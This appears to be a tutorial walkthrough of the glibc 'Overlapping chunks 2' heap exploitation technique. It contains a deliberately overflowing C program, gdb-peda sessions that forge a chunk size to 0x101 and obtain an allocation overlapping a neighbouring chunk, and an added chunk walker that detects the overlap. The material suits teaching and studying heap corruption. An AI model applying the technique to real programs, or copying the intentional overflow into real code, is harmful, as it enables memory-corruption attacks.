Conditions

  • This technique works under the following conditions.
    • The attacker must be able to create a free chunk.
    • The attacker must be able to write a value into the size field of that free chunk.

Exploit plan

  • The attack proceeds as follows.
    • Allocate 5 heap chunks.
    • Free the 4th heap chunk.
    • Overwrite the size field of the 2nd heap chunk with the following value.
      • Value to write: size of the 2nd chunk (0x70 + 0x10) + size of the 3rd chunk (0x70 + 0x10) + PREV_INUSE (1) = 0x101
    • Allocate a heap chunk that fits the overwritten size (once the 2nd chunk has been freed).
      • Requested size: 0x70 + 0x70 = 0xE0
      • The allocation returns the start address of the 2nd heap chunk.
      • This makes it possible to overwrite values in the 3rd chunk.

Overlapping chunks vs Overlapping chunks 2

  • The difference between the two techniques is simple.
    • Overlapping chunks: the size value is modified so that the next chunk points to the Top chunk.
    • Overlapping chunks 2: the size value is modified so that the next chunk points to a free chunk.
  • Ex)
    • Overlapping chunks
      • Overlapping chunks (Original): buf1.nextChunk → buf2 chunk
      • Overlapping chunks (Modification): buf1.nextChunk → Top chunk
    • Overlapping chunks 2
      • Overlapping chunks 2 (Original): buf1.nextChunk → buf2 chunk
      • Overlapping chunks 2 (Modification): buf1.nextChunk → buf3 chunk
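A chunk walker over a constructed heap image with this page's layout, added here as an example (not code from the original page): it reproduces the five 0x80 chunks starting at 0x602000, applies the 0x101 size overwrite to buf2's header at 0x602088, and shows that walking by size fields now skips buf3's header at 0x602100, which is the overlap that an allocator-side or forensic heap-integrity check can flag. Addresses and sizes come from the gdb dumps on this page; the heap image itself is constructed and the function names are my own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HEAP_BASE 0x602000UL   /* heap start seen in the gdb dumps */
#define HEAP_LEN  0x300UL      /* room for five 0x80 chunks plus the top chunk header */
#define CHUNK_SZ  0x80UL       /* chunk size malloc(112) yields on 64-bit glibc */
static uint8_t heap[HEAP_LEN]; /* constructed heap image, not real malloc memory */
uint64_t rd64(uint64_t a) { uint64_t v; memcpy(&v, heap + (a - HEAP_BASE), 8); return v; }
void wr64(uint64_t a, uint64_t v) { memcpy(heap + (a - HEAP_BASE), &v, 8); }
/* Layout after malloc(112) * 5: five in-use chunks (size | PREV_INUSE = 0x81), then the top chunk. */
void build_heap(void) {
    memset(heap, 0, sizeof heap);
    for (int i = 0; i < 5; i++) wr64(HEAP_BASE + i * CHUNK_SZ + 8, CHUNK_SZ | 1);
    wr64(HEAP_BASE + 5 * CHUNK_SZ + 8, 0x20d81); /* top chunk size from the dump */
}

/* The overwrite from the walkthrough: buf2's size field at 0x602088 becomes 0x80 + 0x80 + 1 = 0x101. */
void forge_buf2_size(void) { wr64(HEAP_BASE + CHUNK_SZ + 8, CHUNK_SZ + CHUNK_SZ + 1); }
/* Walk headers as malloc does (next = chunk + (size & ~7)) until the top chunk; fills out[], returns count. */
int walk_chunks(uint64_t out[], int max) {
    int n = 0;
    for (uint64_t p = HEAP_BASE, size = 0; n < max && p + 16 <= HEAP_BASE + HEAP_LEN; p += size) {
        size = rd64(p + 8) & ~7UL;
        if (size == 0 || p + size > HEAP_BASE + HEAP_LEN) break; /* top chunk reached */
        out[n++] = p;
    }
    return n;
}

/* Integrity check: an original header that still holds an in-use size (0x81) but was skipped by the
   walk lies inside another chunk, i.e. the chunks overlap. Returns how many such headers exist. */
int hidden_headers(void) {
    uint64_t seen[16];
    int n = walk_chunks(seen, 16), hidden = 0;
    for (int i = 0; i < 5; i++) {
        uint64_t hdr = HEAP_BASE + i * CHUNK_SZ, found = 0;
        for (int j = 0; j < n; j++) found |= (seen[j] == hdr);
        if (!found && rd64(hdr + 8) == (CHUNK_SZ | 1)) hidden++;
    }
    return hidden;
}

int main(void) {
    build_heap();
    printf("before overwrite: hidden headers = %d\n", hidden_headers()); /* 0 */
    forge_buf2_size();
    printf("after overwrite:  hidden headers = %d\n", hidden_headers()); /* 1: buf3's header at 0x602100 */
    return 0;
}
```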

Example

Source code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>

int main(){
  /* Five chunks of 0x80 bytes each (malloc(112): 112 + 8 header bytes, rounded up to 16). */
  char *buf1 = malloc(112);
  char *buf2 = malloc(112);
  char *buf3 = malloc(112);
  char *buf4 = malloc(112);
  char *buf5 = malloc(112);

  /* buf4 goes into fastbinsY[6]; it will become the "next chunk" of the enlarged buf2. */
  free(buf4);

  /* Intentional overflow: 128 bytes into a 112-byte buffer reaches buf2's size field. */
  scanf("%128s",buf1);

  /* buf2 is freed with the forged size 0x101 and lands in the unsorted bin as a 0x100 chunk. */
  free(buf2);
  /* malloc(224) is served from that chunk, so buf6 starts at buf2 and overlaps buf3. */
  char *buf6 = malloc(224);

  scanf("%224s",buf6);
  return 0;
}

Exploit flow

[Figure: exploit flow diagram (image alt text: "unsorted bin attack")]

Debugging

  • Set break points as follows.
    • 0x400642: call to free(buf4)
    • 0x40065d: after the call to scanf("%128s",buf1)
    • 0x400669: after the call to free(buf2)
    • 0x400673: after the call to malloc(224)

Break points
gdb-peda$ b *0x0000000000400642
Breakpoint 1 at 0x400642
gdb-peda$ b *0x000000000040065d
Breakpoint 2 at 0x40065d
gdb-peda$ b *0x0000000000400669
Breakpoint 3 at 0x400669
gdb-peda$ b *0x0000000000400673
Breakpoint 4 at 0x400673
  • The following heap chunks are allocated.
    • malloc(112): 0x602010, 0x602090, 0x602110, 0x602190, 0x602210
    • When buf4 is freed, its chunk is registered in fastbinsY.
      • fastbinsY[6]: 0x602180

malloc(112) * 5 & free(0x602190)
gdb-peda$ r
Starting program: /home/lazenca0x0/Documents/Definition/OverlappingChunks2 


Breakpoint 1, 0x0000000000400642 in main ()
gdb-peda$ x/82gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x0000000000000000	0x0000000000000000
0x602020:	0x0000000000000000	0x0000000000000000
0x602030:	0x0000000000000000	0x0000000000000000
0x602040:	0x0000000000000000	0x0000000000000000
0x602050:	0x0000000000000000	0x0000000000000000
0x602060:	0x0000000000000000	0x0000000000000000
0x602070:	0x0000000000000000	0x0000000000000000
0x602080:	0x0000000000000000	0x0000000000000081
0x602090:	0x0000000000000000	0x0000000000000000
0x6020a0:	0x0000000000000000	0x0000000000000000
0x6020b0:	0x0000000000000000	0x0000000000000000
0x6020c0:	0x0000000000000000	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000
0x6020e0:	0x0000000000000000	0x0000000000000000
0x6020f0:	0x0000000000000000	0x0000000000000000
0x602100:	0x0000000000000000	0x0000000000000081
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000
0x602130:	0x0000000000000000	0x0000000000000000
0x602140:	0x0000000000000000	0x0000000000000000
0x602150:	0x0000000000000000	0x0000000000000000
0x602160:	0x0000000000000000	0x0000000000000000
0x602170:	0x0000000000000000	0x0000000000000000
0x602180:	0x0000000000000000	0x0000000000000081
0x602190:	0x0000000000000000	0x0000000000000000
0x6021a0:	0x0000000000000000	0x0000000000000000
0x6021b0:	0x0000000000000000	0x0000000000000000
0x6021c0:	0x0000000000000000	0x0000000000000000
0x6021d0:	0x0000000000000000	0x0000000000000000
0x6021e0:	0x0000000000000000	0x0000000000000000
0x6021f0:	0x0000000000000000	0x0000000000000000
0x602200:	0x0000000000000000	0x0000000000000081
0x602210:	0x0000000000000000	0x0000000000000000
0x602220:	0x0000000000000000	0x0000000000000000
0x602230:	0x0000000000000000	0x0000000000000000
0x602240:	0x0000000000000000	0x0000000000000000
0x602250:	0x0000000000000000	0x0000000000000000
0x602260:	0x0000000000000000	0x0000000000000000
0x602270:	0x0000000000000000	0x0000000000000000
0x602280:	0x0000000000000000	0x0000000000020d81
gdb-peda$ ni
0x0000000000400647 in main ()
gdb-peda$ x/82gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x0000000000000000	0x0000000000000000
0x602020:	0x0000000000000000	0x0000000000000000
0x602030:	0x0000000000000000	0x0000000000000000
0x602040:	0x0000000000000000	0x0000000000000000
0x602050:	0x0000000000000000	0x0000000000000000
0x602060:	0x0000000000000000	0x0000000000000000
0x602070:	0x0000000000000000	0x0000000000000000
0x602080:	0x0000000000000000	0x0000000000000081
0x602090:	0x0000000000000000	0x0000000000000000
0x6020a0:	0x0000000000000000	0x0000000000000000
0x6020b0:	0x0000000000000000	0x0000000000000000
0x6020c0:	0x0000000000000000	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000
0x6020e0:	0x0000000000000000	0x0000000000000000
0x6020f0:	0x0000000000000000	0x0000000000000000
0x602100:	0x0000000000000000	0x0000000000000081
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000
0x602130:	0x0000000000000000	0x0000000000000000
0x602140:	0x0000000000000000	0x0000000000000000
0x602150:	0x0000000000000000	0x0000000000000000
0x602160:	0x0000000000000000	0x0000000000000000
0x602170:	0x0000000000000000	0x0000000000000000
0x602180:	0x0000000000000000	0x0000000000000081
0x602190:	0x0000000000000000	0x0000000000000000
0x6021a0:	0x0000000000000000	0x0000000000000000
0x6021b0:	0x0000000000000000	0x0000000000000000
0x6021c0:	0x0000000000000000	0x0000000000000000
0x6021d0:	0x0000000000000000	0x0000000000000000
0x6021e0:	0x0000000000000000	0x0000000000000000
0x6021f0:	0x0000000000000000	0x0000000000000000
0x602200:	0x0000000000000000	0x0000000000000081
0x602210:	0x0000000000000000	0x0000000000000000
0x602220:	0x0000000000000000	0x0000000000000000
0x602230:	0x0000000000000000	0x0000000000000000
0x602240:	0x0000000000000000	0x0000000000000000
0x602250:	0x0000000000000000	0x0000000000000000
0x602260:	0x0000000000000000	0x0000000000000000
0x602270:	0x0000000000000000	0x0000000000000000
0x602280:	0x0000000000000000	0x0000000000020d81
gdb-peda$ p main_arena.fastbinsY[6]
$1 = (mfastbinptr) 0x602180
  • The size field of buf2 can be overwritten as follows.
    • Change the value in that field to the following value.
      • size of the 2nd chunk (0x70 + 0x10) + size of the 3rd chunk (0x70 + 0x10) + PREV_INUSE (1) = 0x101
  • As a result, malloc() treats buf4, rather than buf3, as buf2's next chunk.
Overwrite 0x101 into the size field of the allocated chunk
gdb-peda$ c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, 0x000000000040065d in main ()
gdb-peda$ x/82gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x4141414141414141	0x4141414141414141
0x602020:	0x4141414141414141	0x4141414141414141
0x602030:	0x4141414141414141	0x4141414141414141
0x602040:	0x4141414141414141	0x4141414141414141
0x602050:	0x4141414141414141	0x4141414141414141
0x602060:	0x4141414141414141	0x4141414141414141
0x602070:	0x4141414141414141	0x4141414141414141
0x602080:	0x4141414141414141	0x4141414141414141
0x602090:	0x0000000000000000	0x0000000000000000
0x6020a0:	0x0000000000000000	0x0000000000000000
0x6020b0:	0x0000000000000000	0x0000000000000000
0x6020c0:	0x0000000000000000	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000
0x6020e0:	0x0000000000000000	0x0000000000000000
0x6020f0:	0x0000000000000000	0x0000000000000000
0x602100:	0x0000000000000000	0x0000000000000081
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000
0x602130:	0x0000000000000000	0x0000000000000000
0x602140:	0x0000000000000000	0x0000000000000000
0x602150:	0x0000000000000000	0x0000000000000000
0x602160:	0x0000000000000000	0x0000000000000000
0x602170:	0x0000000000000000	0x0000000000000000
0x602180:	0x0000000000000000	0x0000000000000081
0x602190:	0x0000000000000000	0x0000000000000000
0x6021a0:	0x0000000000000000	0x0000000000000000
0x6021b0:	0x0000000000000000	0x0000000000000000
0x6021c0:	0x0000000000000000	0x0000000000000000
0x6021d0:	0x0000000000000000	0x0000000000000000
0x6021e0:	0x0000000000000000	0x0000000000000000
0x6021f0:	0x0000000000000000	0x0000000000000000
0x602200:	0x0000000000000000	0x0000000000000081
0x602210:	0x0000000000000000	0x0000000000000000
0x602220:	0x0000000000000000	0x0000000000000000
0x602230:	0x0000000000000000	0x0000000000000000
0x602240:	0x0000000000000000	0x0000000000000000
0x602250:	0x0000000000000000	0x0000000000000000
0x602260:	0x0000000000000000	0x0000000000000000
0x602270:	0x0000000000000000	0x0000000000000000
0x602280:	0x0000000000000000	0x0000000000020d81
gdb-peda$ p/x 0x80 + 0x80 + 0x1
$2 = 0x101
gdb-peda$ set *0x602088 = 0x101
gdb-peda$ set *0x60208c = 0x0
gdb-peda$ x/2gx 0x602080
0x602080:	0x4141414141414141	0x0000000000000101
gdb-peda$
  • Free the buf2 chunk as follows.
    • Freeing it creates a free chunk of size 0x100.
Free(0x602090)
gdb-peda$ c
Continuing.
Breakpoint 3, 0x0000000000400669 in main ()
gdb-peda$ x/82gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x4141414141414141	0x4141414141414141
0x602020:	0x4141414141414141	0x4141414141414141
0x602030:	0x4141414141414141	0x4141414141414141
0x602040:	0x4141414141414141	0x4141414141414141
0x602050:	0x4141414141414141	0x4141414141414141
0x602060:	0x4141414141414141	0x4141414141414141
0x602070:	0x4141414141414141	0x4141414141414141
0x602080:	0x4141414141414141	0x0000000000000101
0x602090:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x6020a0:	0x0000000000000000	0x0000000000000000
0x6020b0:	0x0000000000000000	0x0000000000000000
0x6020c0:	0x0000000000000000	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000
0x6020e0:	0x0000000000000000	0x0000000000000000
0x6020f0:	0x0000000000000000	0x0000000000000000
0x602100:	0x0000000000000000	0x0000000000000081
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000
0x602130:	0x0000000000000000	0x0000000000000000
0x602140:	0x0000000000000000	0x0000000000000000
0x602150:	0x0000000000000000	0x0000000000000000
0x602160:	0x0000000000000000	0x0000000000000000
0x602170:	0x0000000000000000	0x0000000000000000
0x602180:	0x0000000000000100	0x0000000000000080
0x602190:	0x0000000000000000	0x0000000000000000
0x6021a0:	0x0000000000000000	0x0000000000000000
0x6021b0:	0x0000000000000000	0x0000000000000000
0x6021c0:	0x0000000000000000	0x0000000000000000
0x6021d0:	0x0000000000000000	0x0000000000000000
0x6021e0:	0x0000000000000000	0x0000000000000000
0x6021f0:	0x0000000000000000	0x0000000000000000
0x602200:	0x0000000000000000	0x0000000000000081
0x602210:	0x0000000000000000	0x0000000000000000
0x602220:	0x0000000000000000	0x0000000000000000
0x602230:	0x0000000000000000	0x0000000000000000
0x602240:	0x0000000000000000	0x0000000000000000
0x602250:	0x0000000000000000	0x0000000000000000
0x602260:	0x0000000000000000	0x0000000000000000
0x602270:	0x0000000000000000	0x0000000000000000
0x602280:	0x0000000000000000	0x0000000000020d81
gdb-peda$ p main_arena.fastbinsY[6]
$1 = (mfastbinptr) 0x602180
gdb-peda$ p main_arena.bins[0]
$5 = (mchunkptr) 0x602080
gdb-peda$ p main_arena.bins[1]
$6 = (mchunkptr) 0x602080
gdb-peda$ 
  • Allocate a chunk that covers the buf3 area, as follows.
    • Allocated heap address: 0x602090
    • Allocated chunk size: 0x100
    • Allocated heap area: 0x602090 ~ 0x602180
Malloc(224)
gdb-peda$ c
Continuing.

Breakpoint 4, 0x0000000000400673 in main ()
gdb-peda$ i r rax
rax            0x602090	0x602090
gdb-peda$ x/82gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x4141414141414141	0x4141414141414141
0x602020:	0x4141414141414141	0x4141414141414141
0x602030:	0x4141414141414141	0x4141414141414141
0x602040:	0x4141414141414141	0x4141414141414141
0x602050:	0x4141414141414141	0x4141414141414141
0x602060:	0x4141414141414141	0x4141414141414141
0x602070:	0x4141414141414141	0x4141414141414141
0x602080:	0x4141414141414141	0x0000000000000101
0x602090:	0x00007ffff7dd38a8	0x00007ffff7dd38a8
0x6020a0:	0x0000000000000000	0x0000000000000000
0x6020b0:	0x0000000000000000	0x0000000000000000
0x6020c0:	0x0000000000000000	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000
0x6020e0:	0x0000000000000000	0x0000000000000000
0x6020f0:	0x0000000000000000	0x0000000000000000
0x602100:	0x0000000000000000	0x0000000000000081
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000
0x602130:	0x0000000000000000	0x0000000000000000
0x602140:	0x0000000000000000	0x0000000000000000
0x602150:	0x0000000000000000	0x0000000000000000
0x602160:	0x0000000000000000	0x0000000000000000
0x602170:	0x0000000000000000	0x0000000000000000
0x602180:	0x0000000000000100	0x0000000000000081
0x602190:	0x0000000000000000	0x0000000000000000
0x6021a0:	0x0000000000000000	0x0000000000000000
0x6021b0:	0x0000000000000000	0x0000000000000000
0x6021c0:	0x0000000000000000	0x0000000000000000
0x6021d0:	0x0000000000000000	0x0000000000000000
0x6021e0:	0x0000000000000000	0x0000000000000000
0x6021f0:	0x0000000000000000	0x0000000000000000
0x602200:	0x0000000000000000	0x0000000000000081
0x602210:	0x0000000000000000	0x0000000000000000
0x602220:	0x0000000000000000	0x0000000000000000
0x602230:	0x0000000000000000	0x0000000000000000
0x602240:	0x0000000000000000	0x0000000000000000
0x602250:	0x0000000000000000	0x0000000000000000
0x602260:	0x0000000000000000	0x0000000000000000
0x602270:	0x0000000000000000	0x0000000000000000
0x602280:	0x0000000000000000	0x0000000000020d81
gdb-peda$ p main_arena.bins[1]
$7 = (mchunkptr) 0x7ffff7dd37b8 <main_arena+88>
gdb-peda$ p main_arena.bins[0]
$8 = (mchunkptr) 0x7ffff7dd37b8 <main_arena+88>
gdb-peda$ p main_arena.fastbinsY
$9 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x602180, 0x0, 0x0, 0x0}
gdb-peda$ p main_arena.fastbinsY[6]
$10 = (mfastbinptr) 0x602180
gdb-peda$ 
